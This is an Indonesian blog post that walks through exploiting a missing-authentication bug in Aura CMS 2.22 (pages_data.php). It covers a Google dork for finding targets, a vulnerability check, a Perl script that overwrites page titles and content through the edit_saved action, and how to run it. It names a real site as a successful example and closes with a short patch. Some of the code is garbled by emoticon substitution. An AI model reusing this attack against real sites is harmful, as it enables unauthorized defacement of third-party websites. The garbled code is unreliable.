wuiih.. lama saya ga posting artikel mengenai dunia yang di cap “hitam” alias “underwear” ( Baca : Gelap ). 
ya, pada kesempatan kali ini saya akan memberikan info mengenai sebuah tekhnik exploit yang dapat digunakan terhadap Aura CMS. tepatnya pada file pages_data.php, ( bug ini udah ada cukup lama lo, sekitar agustus tahun lalu )
CMS karya anak bangsa ini ternyata juga tidak terhindar dari yang namanya “bugs”. wuiih.. ngeri ah, punya saudara sendiri kok di “Exploit” ? >:<
Tenang sahabat, disini saya cuma memberikan info aja kok, dan juga pada artikel ini juga akan dibahas bagaimana untuk mem”patch” bug tersebut, jadi tenang aja buat para sahabat blogger yang kebetulan menggunakan Aura CMS, malah kalian harus bangga lo, menggunakan produk dalam negeri. >U
Ya, mari kita memancing, sebelumnya kita harus caru cacingnya dulu ( baca : umpan ) 
- ketik di google Powered By AuraCMS 2.22
- buka file pages_data.php nya, caranya ketik di address bar seperti ini :
http//www.target.com/js/pages/pages_data.php
ganti yang warna merah sesuai target yang didapat
- bila sitenya sudah di patch akan keluar kata-kata berikut
You Must Login First If Not Yet Have Account Please Register
- bila belum, biasanya kosong dan ada tulisan
{”pages”:[{"id":"1","judul":"blablabla"},{"id":"2","judul":"blablabla"},{"id":"3","blablabla":"blablabla"},{"id":"4","judul":"blablabla"},{"id":"5","judul":"blablabla"}],”pagging”:”"}
Kira-kira seperti itu,
- Selanjutanya siapkan sebuah script perl untuk exploitasinya, Oya sebelumnya bagi yang kompie-nya belum terinstall perl, bisa di donwload dulu disini >> CLICK HERE
berikut contoh script perl yang dibutuhkan :
use LWP:
serAgent;
use HTTP:ookies;
use Getopt:ong;
my $isijudul = “ISI JUDUL”;
my $isikonten = “Isi Konten”;
my $ambilkue = “http://situstarget.com/index.php”;
my $kue = HTTP:
my $hasil = “”;
my $browser = LWP:$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;
$hasil = $browser->get($arbitrary);
$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);$arbitrary .= “1″;
$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
$konten = $hasil->content;
print $konten ;
waw, kok ada smiley nya ?? tenang, ga pengaruh kok tinggal copy paste aja. .
berikut sedikit penjelasannya :
my $isijudul = “ISI JUDUL”; >> ganti dengan judul yang sahabat inginkan
my $isikonten = “Isi Konten”; >> Ganti dengan konten yang sahabat inginkan juga,
my $ambilkue = “http://situstarget.com/index.php”; >> Ganti http://situstarget.com dengan situs asli target sahabat tadi.
$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”; >> Ganti HANYA http://situstarget.com saja !, sesuai target sahabat.
- Copy script diatas dan save dengan extensi .pl, lalu simpan di direktori yang mudah di ingat, ini hanya untuk mempermudah step selanjutnya. >> contoh : C:aura.pl
- buka command prompt, sebelumnya ketik perl -v untuk mengecek, apakah perl yang di download tadi sudah terinstall sebagaimana mestinya. Jika sudah terinstall akan keluar versi dari installer perl tersebut. 
- masuk ke direktori file aura.pl tadi ( udah tau kan caranya ? ), misal ada di dir C, ketik aza >> cd C:
- jalankan file aura.pl tadi. caranya ketik >> C:aura.pl
- lihat hasilnya, ……… Tara….!!, gimana sobat, berhasil kan ?, for example : http://www.pkpujogja.or.id/, ( maaf buat adminnya )
Ya, sekarang adalah bagaimana car mem-”patch” ( baca : tutup ) bug tersebut.
huff… setelah googling cukup lama, akhirnya dapat juga…
if(!cek_login()){
echo “Maaf anda tidak diperkenankan mengakses halaman ini”;
}else{
if (session_is_registered (’LevelAkses’) && $_SESSION['LevelAkses']==”Administrator”){
copy potongan script tersebut dan paste diatas code switch (@$_GET['action']){ pada file pages_data.php
lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi.
sekian sahabat, info dari saya kali ini, semoga bermanfaat, dan ingat, jangan disalahgunakan yah 
Thanks, Teatzo